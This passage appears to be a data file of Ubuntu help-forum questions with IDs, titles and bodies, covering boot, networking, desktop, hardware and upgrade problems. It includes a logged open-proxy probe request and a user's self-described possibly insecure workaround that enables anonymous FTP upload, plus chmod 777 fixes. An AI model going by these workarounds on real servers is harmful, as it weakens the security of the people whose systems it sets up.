nothing i can find just seems to work . any help at all is appreciated and i will try any suggestions as-long as you can provide me with the command : )
52617	what is /usr/lib/i386-linux-gnu/ for ?	i 'm using an application that , when searching for installed dependencies , looks up some .so files in /usr/lib and /usr/local/lib/ . now i migrated on natty and some files seem to be moved from /usr/lib to /usr/lib/i386-linux-gnu/ . should i report a bug to that application developers that they should change their lookup logic ? is there a document that explains the change so i can refer it to them ?
52618	/dev/nfs or /nfs-root does not exist	i 'm running ubuntu 10.10 on a client which i 'm trying to get to boot off a server running 10.10. nfs seems to work fine on the server . if i boot the server off its internal disk , i can mount filesystems on the server . my /tftpboot/pxelinux.cfg/default file looks like this : label linux kernel vmlinuz-2.6.32-24-generic append root=/dev/nfs initrd=initrd.img-2.6.32-24-generic nfsroot=192.168.1.71 : /n fsroot ip=dhcp rw when the cleint tries boot from the server , it can not find /dev/nfs
52620	10.04 ubuntu desktop on ubuntu 11.04 ?	question is this . is there a way i can install the ubuntu desktop version from say 10.04 or 10.10 into ubuntu 11.04 ? i know you used to be able to do sudo apt-get install ubuntu-desktop in the the terminal but can you do that now in 11.04 ? i kinda like unity and the bar on the left but it is a tad annoying sometimes when i minimize applications etc . if i can install the old ubuntu desktop that 'd be great . thanks for any and all help/ideas !
52622	which security features are disabled when i start wireshark ?	i want to know which security features are disabled ( if any ) when i start wireshark in ubuntu 10.10 .
52628	what is the purpose of the shared with me folder ?	what is the purpose of the shared with me folder ? . it is a public folder , for sharing files with other users . i was curious because i do not want to place things in there and have them made public .
52629	configuring syslog for bash script logging	i want to use syslog to do some bash script logging . i see /etc/rsyslog.d/50-default.conf , but i 'm new to syslog . i want to configure local0 for logging for my scripts . should i be editing this configuration file ? it has a bizarre name that throws me off . or should i be creating some new file for my configuration that gets read somehow ? i just want to follow established standards here .
52631	show up linux partition on windows	i have 5 systems that are connected to a network switch desktop ( 1 ) : ubuntu 10.04 lts netbook ( 1 ) : windows 7 starter desktop ( 1 ) : windows 7 professional laptops ( 2 ) : ubuntu 11.04 now , i need to make a data-backup central , which store all data ( from all my systems ) on desktop running ubuntu 10.04 lts what i need is , how to make my linux system show up on windows ? i also want to map user-to-directory , so that when i log-in to my desktop using windows , i should be asked login credentials , and on successful login , i should be presented on that directory , that i have permission .
52635	how can i fix the compiz effects lag in unity ?	i 've recently installed ubuntu 11.04 , and i actually liked unity ( although many others prefer gnome ) , but there seems to be a lag problem . every time i press the super button to bring out the dash , or super+w to show all windows , or any other action that involves some sort of effect , the effect lags a bit , and it could get really annoying . i 've seen a fix using compizconfig settings manager , but that does n't seem to work for me . i 've got a nvidia 9800 gt 1 gb video card , a 2 gb ram , and not sure about the cpu ( if you need it , tell me and i 'll figure it out ) . any help would be appreciated thanks in advance .
52638	audio not working for acer aspire 5552	i have had this problem for a while , nothing recognizes my soundcard , i have had sound in here at one point and now it is 'poof ' gone ... if someone could help that 'd be great .
52639	is there a way to `` merge '' a virtual folder and a real one in evolution ?	as i understand evolution mixes two kinds of folders in its mail folders pane : real folders ( that exist on the server ) virtual folders ( e.g . messages marked for deletion are grouped in a virtual `` trash '' folder , messages it thinks are spam in a virtual `` junk '' folder ... ) . every other mail client ( and webmail system ) has real folders for both examples , so in every imap account configured in evolution i have two trash folders , two spam folders ... is there a way to tell evolution it should `` merge '' them ?
52640	how to save power on a xubuntu server ?	i installed xubuntu 11.04 amd64 on an 'old ' pc i have lying around . i quite like how xfce has come along , but alas , this box will become headless shortly . specs : gigabyte p35-ds3p intel e8200 @ 2.66 ghz 4 gb ram geforce 8600 gt ( passively cooled ) clearly this is way overboard for a simple file server . how do i best go about reducing power consumption of the cpu ? gpu ? is bios my best option ? will linux take care of itself ? thanks .
52641	problem using mobile broadband and wire network at the same time	maybe someone can assist a beginner to solve a problem . i have set up mobile broadband and wired network in the network manager in ubuntu 11.04 . yet , they wo n't work at the same time . wired network seems to have priority and is connected at start up . to get the mobile broadband connection running i have to manually delete the wired network from nm every time . the other way around i can get the wired network running by disabling mobile broadband . i tried to fix things by manually configuring the wired network , but it did n't help . nm in ubuntu seems to see these two connections as two different networks and does n't accept them running at the same time . in windows 7 as well as in xp the same combination works without any problems . any idea how to fix this problem ? maybe by handling mobile broadband through wvdial and wired network through nm ? this may be a workaround , but i 'd prefer to handle both connections through nm . any help is very appreciated .
52643	how to get diamond extreme 7.1 in natty working	i am trying to set up the diamond extreme 7.1 ddl in natty . the only thing that works are the analog outputs . but in order to enjoy movies with dd 5.1 or dts i need the optical out to function . another problem is that my old yamaha receiver does n't handle dts directly , so i need either dolby digital live to transform it or ffdshow audio codecs ( throughput to spdif only results in noise ) . and third , i am addicted to ddl to enjoy stereo sources in surround sound . ddl works much better than dolby prologic ii . any idea how to get this working in natty ? at least i need to get the optical out working ( though dolby digital live is also very desirable ) . i tried to set things in alsa mixer but without results . coming from the windows side and being new to ubuntu i really have a hard time to get things working the way i was used to . is there at least some similar codec pack like ffdshow that i could use in ubuntu ? any help would be very appreciated .
52649	`` allrequestsallowed.com '' ... hack attempt ?	i have many attempts on my ( small , personal and absolutely unimportant ) web server , and apache and fail2ban usually do their job right . but there 's a log entry that worries me : xx.yy.www.zzz - - [ 9/jul/2011:12:42:15 +0100 ] `` get http : //allrequestsallowed.com/ ? phpsessid=5gh6ncjh00043yvmwtw_b % 5cfap http/1.1 '' 200 432 `` - '' `` mozilla/5.0 ( windows ; u ; windows nt 5.0 ; en-us ; rv:1.8.1.12 ) gecko/20080201 firefox/2.0.0.12 '' the problem is answer was n't a 404 code , but a 200 instead . is that okay ? seems weird to me , but my knowledge on this field ( and many others ) is , to put it softly , limited .
52655	is wayland coming to ubuntu oneric ?	less than a year ago , ubuntu developers announced that wayland , the new display server is going to be default in ubuntu , instead of x . at that time it was far too late to get it to natty , as wayland needed lots of work , so it was postponed to oneric . long time has passed and i have n't heard nothing about wayland in ubuntu . are this plans still considered ? will ubuntu oneric use wayland as the display server ? if yes , how will it be done and what will be the consequences ? if not , then when can i expect it , and what work around it is being quietly done at the moment ?
52662	in terms of battery usage , which distro is more efficient between lubuntu and xubuntu ?	installing both on the same laptop without doing nothing more than the normal install , which one consumes less battery power at the end and makes the laptop last a little bit longer than the other , lubuntu ( lxde ) or xubuntu ( xfce ) . assuming that both will receive the same activities on the same laptops for the same amount of time .
52663	why i ca n't install gdm login manager theme from gnome-art ?	here is the question : recently i installed the ubuntu 11.04.i still use the classic gnome desktop environment with the gdm ( version:2.32 ) login manager . and i want to change the login screen with the cool login theme at the gnome art and install the gnome-art tool to install login manager themes from it . unfortunately , its install button is gray . why ? howto ? i just can not fix the core of the question . according to many advices , i used some other configure tools like gnome tweak , and gdm tweaker , gdmsetup and so on . however , some of them just can change the login background with a picture , what i really need is how to install the login manager themes file ( .tar.bz2 format ) from the gnome art web . i do n't know weather you have understood it ? every answer is welcome .
52664	how do i set up a local domain name in apache and ubuntu , eg website.sam ?	i would like to map my directories/subdomains in the following way : /home/sam/sites/* to http : //*.sam i do n't want to have to add a line to my hosts file every time i spool up a new site . i 'm a beginner when it comes to configuring and installing apache , what 's the best way to achieve this ?
52668	small non-native firefox icons	i want to use firefox with it 's default button set as shown below . as you can see , most noticeably the back/forward and new tab buttons are dissimilar to the gtk icons that firefox in ubuntu sports by default . the point of the question is that i want to replace those gtk icons with the native firefox ones similar to the ones in the image . source firefox/4.0 linux theme mockups
52671	is there any way to separate irc networks in pidgin 's chat window ?	i am normally active in at least three different irc networks , and i use pidgin as my irc client , with the vertical channel list like this : is there any way that channels from different irc networks can be separated from one another , while still having everything in this one window ? here 's basically a mockup of what i 'm looking for : i do n't like xchat or irssi .
52673	how can i get microsoft excel 2003 to work in wine ?	i used to be a ms excel 2003 guru . i installed ms office in ubuntu with wine , but the macros make excel crash . is there any way to get this working ? i 've been thinking to install vmware with winxp , but i would like to run excel ( for instance ) from the ubuntu desktop ( i do n't know if that 's possible ) . i 've tried to install the dll 's in wine , but without success . whining : i 've tried to 'work ' with openoffice , but the language and the ide are getting to me . i 'm trying to create a database with base and extract the data with calc , but i 've been struggling for days where i would have finished already with access/excel . edit : finally with vmware player , winxp & office 2003 , i 'm set to go ...
52676	why is there a user called couchdb administrator on my system ?	it 's clogging up my gdm login screen . also , what would happen if i deleted this user ?
52678	is it possible to restart only the dash and panel with launchers without restarting unity ?	i know there is `unity-panel-service ' , which is used for restarting the panel . but it is possible restart the `` dash/launchers '' section without restarting the whole unity plugin ? i have used for my gftp quicklist , the way with unity -- replace & , but this is not the best way . if you have quicklist with possibility to generate menu items dynamically , it would be nice to have possibility restart only the whole launcher . i have try also , to get the favorites list with gsettings , change it and roll it back , but without awaited result . for now only the unity -- replace is the working solution or not ?
52679	mount blackberry pearl as usb mass storage device	is there are any possibility to make my blackberry pearl as usb mass storage device ? when i plug my phone then i check in terminal withlsusb command , my phone is detected . but i dont know how to make it as usb mass storage device . i want transfer files easily just like common usb flashdisk . i found package name barry but not as im expected , it just sync my contact and else , but not for transfer file .
52684	lightdm and the need for a greeter in set-top box environment	lightdm can be used in a set-top box environment , ie starting a configured x session as a configured user ; in this case all data will be retrieved from the config file . can lightdm work/be installed without any greeter , to minimise the footprint on such a minimal system ?
52686	how can i install ubuntu to a flash drive ?	how to install ubuntu 11.10 ( alpha ) to a flash drive ?
52688	is there any way to disable the default behavior of the insert key ?	i keep hitting it accidentally and it really annoys me ... is there any way to disable it 's default behavior ?
52691	permissions problem when upgrading wordpress to 3.2 through the admin interface	i 'm using 10.04 server i 'm trying to upgrade wordpress through the admin interface . i have a vsftpd server running and it is accepting local connections . for my ftp credentials i supplied the following : hostname : 127.0.0.1:21 username and password : the user supplied has write access to the /var/www directory structure . using plain ole ftp , not secure . when i submit the upgrade , the following message is returned after a bit of time ( 1-2 minutes ) : downloading update from http : //wordpress.org/wordpress-3.2.zipâś unpacking the updateâś could not create directory . : /var/www/wordpress/wp-content/upgrade/wordpress-3.tmp installation failed i 'm assuming this is a permissions issue , but i have n't been able to figure it out . even setting the directories chmod 777 does n't work . any ideas ? thanks ! edit : testing with ftp 127.0.0.1 gives the following : $ ftp 127.0.0.1 connected to 127.0.0.1 . 220 ( vsftpd 2.2.2 ) name ( 127.0.0.1 : wpuser ) : 331 please specify the password . password : 230 login successful . remote system type is unix . using binary mode to transfer files . ftp > mkdir /var/www/wordpress/wp-content/upgrade/test/ 550 permission denied . perhaps something is wrong with my vsftpd settings ? here is the vsftpd.conf file : listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem edit part 2 : i can not submit an answer yet because i do n't have enough reputation . this is how i fixed it though : i finally fixed the issue , although it may not be the best solution . keep in mind the ftp service is not accessible to the outside internet . so wordpress tries to use ftp to create the directories and files needed for the upgrade . it does this when uploading plugins or themes as well . because i also could n't create a directory over ftp , i decided to try the following in the vsftpd config : anon_upload_enable=yes anon_mkdir_write_enable=yes i restarted the server and everything worked . now , i assume that this can be a security issue of some sort , but the anon account is disabled ( anonymous_enable=no ) . also , as an aside and a response to both the other suggestions about directory permissions , here is what i tried permissions-wise on the server . all wordpress directories 775 all wordpress files 664 owner : my user , group : users www-data user added to the users group ( just a test , did not work obviously ) so i think www-data had write access to the necessary directories , but it still did not work . that 's why i started exploring the ftp server issues . i welcome any comments on this .
52693	recover deleted data with rm -rf ?	i accidentally deleted /home with sudo rm -rf . i tried to restore it with testdisk , but because ubuntu is from wubi , it can not list the filesystem and i do n't know another way to do this . how could i restore my data ? it 's important . i 'm using 10.10 on wubi
52701	how can i get a spyder 2 colorimeter working ?	i 've got a spyder 2 colorimeter that i 'm trying to get to work under natty ( 11.04 ) . i 'm following the instructions that are outlined here and the output i 'm getting in the terminal is : setting up the instrument ... aborted . i 've used this same device with success on windows and on ubuntu 10.04 . i 've tried using dispcalgui which is a wrapper around the argyllcms tools , and i get the same results . how would i go about determining what is going wrong ? i 'm already running dispcal with the verbose flag and it 's not being very verbose ( ! ) edit : here 's some additional information about what i 've tried so far and common solutions listed in the argyllcms and dispcalgui faq respectively . installed the driver using spyd2en and it works successfully . done sudo chmod 777 /dev/bus/usb/002/006 to make the device read/write/executable by everybody . i understand the device entry changes , and i determined the correct entry using lsusb . run dispcalgui as root . this is the output of lsusb . bus 002 device 006 : id 085c:0200 colorvision , inc. monitor spyder bus 002 device 005 : id 045e:0039 microsoft corp. intellimouse optical bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0402:9665 ali corp . bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
52716	maximize windows to physical screen when using a virtual resolution w/xrandr	i have a netbook with a small screen in widescreen format ( 1024x600 ) , which means that a lot of programs whose designers did n't imagine such a thing open windows that ca n't be resized and whose bottoms are obscured . through ubuntu 10.04 , i took care of it with an xrandr command : xrandr -- output lvds1 -- fb 1024x768 -- panning 0x768 ( note the 0x ) which had the effect of giving me a normal-sized virtual desktop that panned vertically , but which ( somehow ) the window manager ignored , so maximized windows only occupied the physical screen . the result was that i did n't have to pan unless a large dialog box popped up : nice . in 11.04 , this does n't quite work . everything i said above is true , but the bottom 168 pixels seem permanently blackened , so that if a large window extends down there i ca n't see what 's in it ( however , it is there : the resize handles appear , and are useful on those occasions that resizing is allowed ) . i imagine this is unity-related . that defeats the purpose , so i 'm trying this xrandr command : xrandr -- output lvds1 -- fb 1024x768 -- panning 1024x768 ( note the 1024x ) . alas , it does not trick the window manager anymore , and maximized windows all go off the bottom . question : how do i set things up so that a `` maximized '' window takes up only the physical screen ( or more generally , takes up a particular piece of screen ) ? a related question i 'd be happy to have answered instead is : why does the first xrandr command fool the window manager ( the `` 0x '' means , according to the man page , that panning along the horizontal axis is disabled ; functionally , this is meaningless since the virtual size is the same as the physical size ) ? what goes wrong with unity ? note that the `` maximize '' action is necessary , since in unity , a maximized window is styled differently : its titlebar is absorbed into the toolbar at the top of the screen , saving valuable pixels for me . simply resizing a window is not a good alternative . references : i found this question : i 'd like to prevent maximize from covering one third of the screen . i was very disappointed when compiz maximumize appeared to do nothing at all ( there 's a launchpad bug : https : //bugs.launchpad.net/ubuntu/+source/compiz-fusion-plugins-extra/+bug/462158 ) . i also found the same question on superuser : http : //superuser.com/questions/269966/id-like-to-prevent-maximize-from-covering-one-third-of-the-screen , which offers two alternatives . the compiz grid plugin does n't help because it does n't maximize , as i described above . i have not tried the python window organizer , but it looks similar to grid . in general i do n't expect that clever scripts will help , because the meaning of `` maximize '' is controlled by the window manager itself , and so the solution should be a compiz solution . is there one ?
52725	why do my ( youtube ) videos play for two seconds , then stop ?	lately ( a week or so ) i have this incredibly annoying bug : every once in a while i get to the point were youtube and other .flv-videos play for two seconds and then stop . if i press start and stop or skip to another position in the video , i get another two seconds . *restarting gnome helps it for a while , resta*rting firefox/totem does n't help . i did not change a thing in my video or flash-player options . the problems occurres in totem as well . vlc is fine . edit : gnash seems to help the problem but creates others : with gnash there are a few webplayers that simply do n't work anymore . the 64bit-nonfree has the same problems as the 32bit-nonfree ( 2 seconds then stop ) . the problem is independent of gpu validation . clearing cache and cookies makes no difference . only restarting gnome helps . edit2 : here is some info on my system . the error occures much less frequent since 12.04 but is still there .
52728	why does grub store multiple kernels ?	is there some sort of best practice around removing them ( when/how/why ) ? what is the point of keeping them around in the first place and why would you even put them in grub ? i guess there is not a `` problem '' per say , but i am just curious about that design decision . correct me if i am wrong , but you can still use the old kernels with the new user interface right ?
52734	/var/lib/ureadahead/debugfs eats up 68 % of my disk space	on a device with 2gb storage every mb is counted . i wonder what is this /var/lib/ureadahead/debugfs doing on my system and is there a way to avoid its existence . note this mount point eats up 1.2 gb # df -h filesystem size used avail use % mounted on /dev/sda1 1.8g 1.2g 546m 68 % / none 995m 224k 995m 1 % /dev none 1000m 0 1000m 0 % /dev/shm none 1000m 136k 1000m 1 % /var/run none 1000m 0 1000m 0 % /var/lock none 1000m 0 1000m 0 % /lib/init/rw none 1.8g 1.2g 546m 68 % /var/lib/ureadahead/debugfs # cat /proc/self/mountinfo 15 19 0:0 / /sys rw , nosuid , nodev , noexec , relatime - sysfs none rw 16 19 0:3 / /proc rw , nosuid , nodev , noexec , relatime - proc none rw 17 19 0:5 / /dev rw , relatime - devtmpfs none rw , size=1018860k , nr_inodes=254715 , mode=755 18 17 0:12 / /dev/pts rw , nosuid , noexec , relatime - devpts none rw , gid=5 , mode=620 , ptmxmode=000 19 1 8:1 / / rw , relatime - ext4 /dev/disk/by-uuid/68bf9687-2dec-49fd-a37d-5532c19f3a39 rw , errors=remount-ro , barrier=1 , data=ordered 21 15 0:15 / /sys/fs/fuse/connections rw , relatime - fusectl none rw 22 15 0:7 / /sys/kernel/debug rw , relatime - debugfs none rw 23 15 0:10 / /sys/kernel/security rw , relatime - securityfs none rw 24 17 0:16 / /dev/shm rw , nosuid , nodev , relatime - tmpfs none rw 25 19 0:17 / /var/run rw , nosuid , relatime - tmpfs none rw , mode=755 26 19 0:18 / /var/lock rw , nosuid , nodev , noexec , relatime - tmpfs none rw 27 19 0:19 / /lib/init/rw rw , nosuid , relatime - tmpfs none rw , mode=755 # du -a /var | sort -n -r | head -n 10 138576 /var 87496 /var/lib 61164 /var/lib/apt 61120 /var/lib/apt/lists 34120 /var/cache 30668 /var/cache/apt 26108 /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_lucid_universe_binary-amd64_packages 18996 /var/lib/dpkg 16952 /var/lib/dpkg/info 15320 /var/cache/apt/srcpkgcache.bin
52736	why is my laptop 's wireless internet connection slow ?	i 'm sitting on the same level as my wireless router but still the internet is acting pretty slow . ping any-fp.wa1.b.yahoo.com ( 69.147.125.65 ) 56 ( 84 ) bytes of data . 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=1 ttl=55 time=13.0 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=2 ttl=55 time=14.1 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=3 ttl=55 time=14.7 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=5 ttl=55 time=12.9 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=6 ttl=55 time=13.7 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=7 ttl=55 time=34.4 ms 64 bytes from ir1.fp.vip.re1.yahoo.com ( 69.147.125.65 ) : icmp_req=9 ttl=55 time=13.5 ms following are results from speedtest - even though speeds seem to be fine , the download test took over 5 minutes ... last result : download speed : 6714 kbps ( 839.3 kb/sec transfer rate ) upload speed : 4069 kbps ( 508.6 kb/sec transfer rate ) is there a way to `` flush '' the connections on ubuntu and start over again ? i think i 've been noticing this problem eversince i came back from another country where i had to create a dsl wired connection to get access to the internet . also , ever since then when i try to connect to ethernet ( wired ) it does n't work . is there a way to get everything back to default .
52737	optimizing rarely used server installed in an always up virtual machine	i have a ubuntu server installation on virtualbox since i am a mac os x user and i want to launch some linux-dependent programs on ubuntu rarely by connecting it via ssh . therefore i want to make a fine tuning to ubuntu installation ( not as much as changing the kernel ) to consume less system resources . on the idle state ( no ssh clients connected , no intentional user programs running ) it consumes about % 2-2.5 cpu and 450 mb of ram . i 'm looking for ways to decrease this . main purpose is to develop some c programs using vim and gcc .
52741	how can i install my logitech mx5000 keyboard ?	how do i install my keyboard logitech ( mx5000 )
52748	very choppy flash during fullscreen mode	when i try to play flash videos in full screen , sometimes - but not all the time , which makes this bug so aggravating ! - the video gets very , very choppy , and ui controls do not really respond at all . sound works fine . disabling compiz does nothing to alleviate the problem ( switching to ubuntu classic ( no effects ) - i even created a new user just to test this out to make sure it was n't a local configuration problem ) . this problem exists both in the latest beta build of chrome and the most up-to-date firefox with latest flash . no problems when i watch a video in full-screen , it seems to be just flash.. and videos tend to play just fine when not in full-screen mode . i 'm on a thinkpad w510 with an nvidia quadro fx 880m graphics card . if anyone could be help this would be much appreciated .
52750	update.rc-d init.d startup script is not starting	i got a simple script called hwtestinit which i installed using update-rc.d hwtestinit defaults on the surface , as far as i can inspect , all seems fine , i mean , the following files , all exists , etc . /etc/rc0.d/k20hwtestinit - > ../init.d/hwtestinit /etc/rc1.d/k20hwtestinit - > ../init.d/hwtestinit /etc/rc6.d/k20hwtestinit - > ../init.d/hwtestinit /etc/rc2.d/s20hwtestinit - > ../init.d/hwtestinit /etc/rc3.d/s20hwtestinit - > ../init.d/hwtestinit /etc/rc4.d/s20hwtestinit - > ../init.d/hwtestinit /etc/rc5.d/s20hwtestinit - > ../init.d/hwtestinit when i run the script manually , all seems fine , that is , issuing the command /etc/init.d/hwtestinit start yields to the desired results.however , system is not executing the on startup , and i have no idea why . i could not find any mention of it at logs files found under /var/log and wonder ins which other log file i should look at . the script is dumped below # ! /bin/sh case `` $ 1 '' in start ) smarteventd -c /etc/sctest.ini lcdaemon -- lcdtest ; ; stop ) smarteventd -- stop lcdaemon -- stop ; ; * ) echo `` usage : /etc/init.d/hwtestinit { start|stop } '' exit 1 ; ; esac exit 0
52759	can i sync only some music to ubuntu one , or stream to a pc ?	i have more music on my desktop computer than will fit on my laptop 's fairly small ssd . is there any way i can sync just some of it to my laptop , or do a kind of cached streaming like on android ? i suppose i could choose to sync just particular folders for albums i currently like but that seems a bit tedious .
52763	mouse raises the wrong window after switching windows with keys	prelude : i have focus follows mouse , and also raise focused window . when i switch windows with the keyboard ( alt-tab ) , the new window gets focus and is raised . however , when the mouse pointer is still in some other windows , then moments later that window gets focus and will be raised instead . this makes the shortcut useless . i remember that it used to be a bit different : the window manages used not to care about the mouse pointerâs position if the mouse remained unused after switching windows with the keys . i think that was very sensible . is there a way to come to a similar effect now ?
52764	security camera system server	i 'd like to setup a security camera system which is captures and stores video streams into ubuntu server from 2 wireless cameras . which type of motion-detecting wireless camera you suggested ? are there any software to capture the videos on schedule time from the server ? and which software do i need to remote control the cameras ?
52765	boot from usb freezes	i am a total beginner to both linux and ubuntu . i have a netbook , an acer aspire one d255 with windows 7 . i want to boot from usb ( no cd-drive on netbook ) to first try ubuntu and perhaps install it if it works fine . i created a bootable usb ( as shown on the ubuntu website ) , with ubuntu netbook remix ( 10.10 ) i booted , and on startup , a purple screen with at the bottom a stickfigure in a circle and next it something ( a harmonica ? a chocolate bar ? a strip of ram ? ) this shows for a second or 2 , and then i get a black screen with a blinking cursor , and nothing happens after this . then , i created a bootable usb with the most recent desktop-version ( 11.04 ) it boots , it gives me menu , but if i press a key , everything freezes . when i do n't press a key , it starts running from usb , and it does performs 2 loading steps and then noting ... total freeze ... what is going on and what am i doing wrong ? update : i tried waiting for 15 minutes but i still did not get a response . loading /casper/vmlinuz/ ... ... . loading /casper/initrd.lz ... ... ... ... ... ready . _ ( blinking cursor )
52767	how do i control the upload/download bandwidth per user ?	how to control bandwidth upload and download per user or each ip/mac ? i tried squid3.0stable25 with delay_pools but its not work . is it really possible to control bandwidth for each host by squid ? my isp have 400 more host but they are using open bw . i want to limit there upload and download how to do it ? i also try htb but setup failed or not working and did n't get perfect example . please help ! !
52769	degredation test of raid 1	i have just configured two hard drives with raid1 via an ubuntu 10.4 installation . it is installed to boot in degraded mode . i want to disconnect the power from the one drive and have it boot , and then put the power back and have it go back to original setup . how do i do this ? the degredation test is simple , just remove the one hard drive , but then how do i put that removed hard drive back without having to do a full rebuild of the raid array ?
52770	how to make ubuntu one work with gnome 3 ?	i 've installed gnome 3 using the following commands ( using ubuntu 11.04 natty narwhal ) sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell my problem is that the ubuntu one nautilus integration ( right-click menu options ) disappeared , although i 've checked and the ubuntuone-client-gnome package is still installed ( which is afaik responsible for the integration of the service ) . also , there are no more checkboxes on the shared items , no visual sign of synchronization activity - though the backend is working and synchronizing files put in the ubuntu one folder as supposed to . any ideas how to restore the desktop integration , or i will have to wait until a new version of the client is released ?
52773	how do i set up shared folders in a windows xp virtualbox guest ?	i have installed virtualbox-ose on ubuntu 11.04 and windows xp pro as the virtual machine . now i want to have a shared folder which can be accessed on both , the virtual machine , and my xp guest machine . how can i do that ?
52776	klipper icon on top panel is n't functioning	when clicking on the klipper icon on the unity bar nothing happens . no drop down list . is there anybody able to resolve it ? ..
52777	xp virtualbox guest machine ubuntu	how can i have a shared folder that is accessible on both the guest machine and host machine
52780	configuring touchscreen	i 'm trying to calibrate touchscreen on ubuntu 10.10 . my problem is that touchscreen is working , but calibration is horribly off - i 'm able to navigate only a small portion of upper-left corner ( while i 'm pressing all over the screen ) . and my xorg.conf file does not even have an entry for this device . what can you recommend me to do to configure it ?
52781	windows mounting point	is there any way to specify the mounting point of the windows partition ( /dev/sda2 in this case ) and make it mount on startup ?
52784	only the first computer can connect to any given vpn network	i 'm using ubuntu 10.10 with firestarter to share the internet connection . there are some people on the network that need to connect to an external vpn . the problem is that only the first computer can connect to any given vpn network . if another computer needs to connect to an external vpn server , it is necessary to reboot ubuntu and/or firestarter for them to access it . can somebody please help me with fixing this ?
52785	ubuntu/kubuntu lts : longer support for server packages	i read that ubuntu 10.04 lts desktop is supported till april 2013 , but server is supported till april 2015 . if i install ubuntu lts desktop , will the server packages of the system still be updated until april 2015 ? i do n't care about security updates to the desktop parts ( the gui for the server i 'm setting up is rarely used , and not for anything dangerous like email and web browsing ) , but i do care about the server parts ( like ssh , etc. ) . and if so , would the same hold true for kubuntu ? the lts announcement naturally does not mention the longer server support window ( seeing as to how it is a desktop distribution ) , but i wonder if the server packages will still get updates till 2015 ?
52787	how can i make programs open on a specific monitor ?	i 've read a bit about window managers , but i 'm not sure if that 's what i need or not . i 'm using my maverick laptop at work with an external monitor added and set so they do n't mirror . i 've used a mac at work up until recently ( although linux at home ) and admit that i 've been a bit spoiled with their spaces and app handling - you can , in the settings panel , indicate that a specific app should always open on a specific monitor . so , for example , i want my ide to always open on the larger external monitor , while thunderbird should always open on the small laptop screen . is there a way to do this in ubuntu ?
52789	drag-and-drop file onto script in nautilus	in windows explorer ( and other file managers ) if you drag a file onto a script/executable , then it runs the script/executable with that file as the first argument . is it possible to get a similar behaviour in nautilus ? ( would i have to use .desktop files / launchers ? ) how about other linux file managers ?
52793	do-release-upgrade stopped , and could n't re-run	i tried ubuntu upgrade from 10.04 to 10.10 , and 11.04 . it was successful from 10.04 to 10.10 , but while upgrading from 10.10 to 11.04 , i felt something wrong , and stopped it . and i tried to re-run do-release-upgrade , but failed . here are error messages . checking for a new ubuntu release /usr/lib/python2.6/dist-packages/apt/progress/old.py:134 : deprecationwarning : apt.progress.fetchprogress is deprecated . fetchprogress.__init__ ( self ) /usr/lib/python2.6/dist-packages/updatemanager/core/distupgradefetchercore.py:202 : deprecationwarning : apt_pkg.getacquire ( ) is deprecated . please see apt_pkg.acquire ( ) for the replacement . fetcher = apt_pkg.getacquire ( self._progress ) /usr/lib/python2.6/dist-packages/updatemanager/core/distupgradefetchercore.py:205 : deprecationwarning : apt_pkg.getpkgacqfile ( ) is deprecated . please see apt_pkg.acquirefile ( ) for the replacement af = apt_pkg.getpkgacqfile ( fetcher , uri , descr=_ ( `` upgrade tool signature '' ) ) /usr/lib/python2.6/dist-packages/updatemanager/core/distupgradefetchercore.py:208 : deprecationwarning : apt_pkg.getpkgacqfile ( ) is deprecated . please see apt_pkg.acquirefile ( ) for the replacement af = apt_pkg.getpkgacqfile ( fetcher , self.uri , descr=_ ( `` upgrade tool '' ) ) /usr/lib/python2.6/dist-packages/updatemanager/core/distupgradefetchercore.py:209 : deprecationwarning : attribute 'run ' of the 'apt_pkg.acquire ' object is deprecated , use 'run ' instead . if fetcher.run ( ) ! = fetcher.resultcontinue : failed upgrade tool signature failed upgrade tool done downloading failed to fetch fetching the upgrade failed . there may be a network problem . is there any way to re-run do-release-upgrade , or reset upgrade status ?
52796	automatically sync android photos with my pc	today i signed up for the ubuntu one free account . this has worked , and i have a couple of folders , and i added one file into one of those folders . all synced with ubuntu one ok. then , i installed the `` ubuntu one files '' app onto my android phone . i selected `` auto-upload any new photos '' on installing . after signing in , i could see my folders , and the one file , i selected this and it downloaded to my android phone . perfect . then i took a photo on my phone . no auto-upload . hmm , mildly irritating . but i still have the `` share '' option , this allows me to share to ubuntu one . fine , i selected that . and it uploaded the photo . but now , on the web , i have a new folder , under `` my synced folders '' there 's a new folder called `` ~/pictures - gt-i5700 '' , this contains my photo . this has not synchronised to my pc though . my pc folders are under the `` folders '' title . it seems there 's no way to move this picture from the `` synced folder '' called `` ~/pictures - gt-i5700 '' into a folder that is synchronised with my pc . am i doing something wrong ? because this is not intuitive . my expectation , was to take a photo on my android phone , and ubuntu one would make this appear on my pc . so what do i need to do to make this happen ? regards steve vaughan
52800	adding icons to desktop after package installation	is there any way to automatically add icons for an application when a package is installed ? the ideal use case would be that a user decides to install an application and , as part of the postinstall script , the application icons are added to the desktop . after that , when the application is uninstalled , they icons are automatically removed from the desktop .
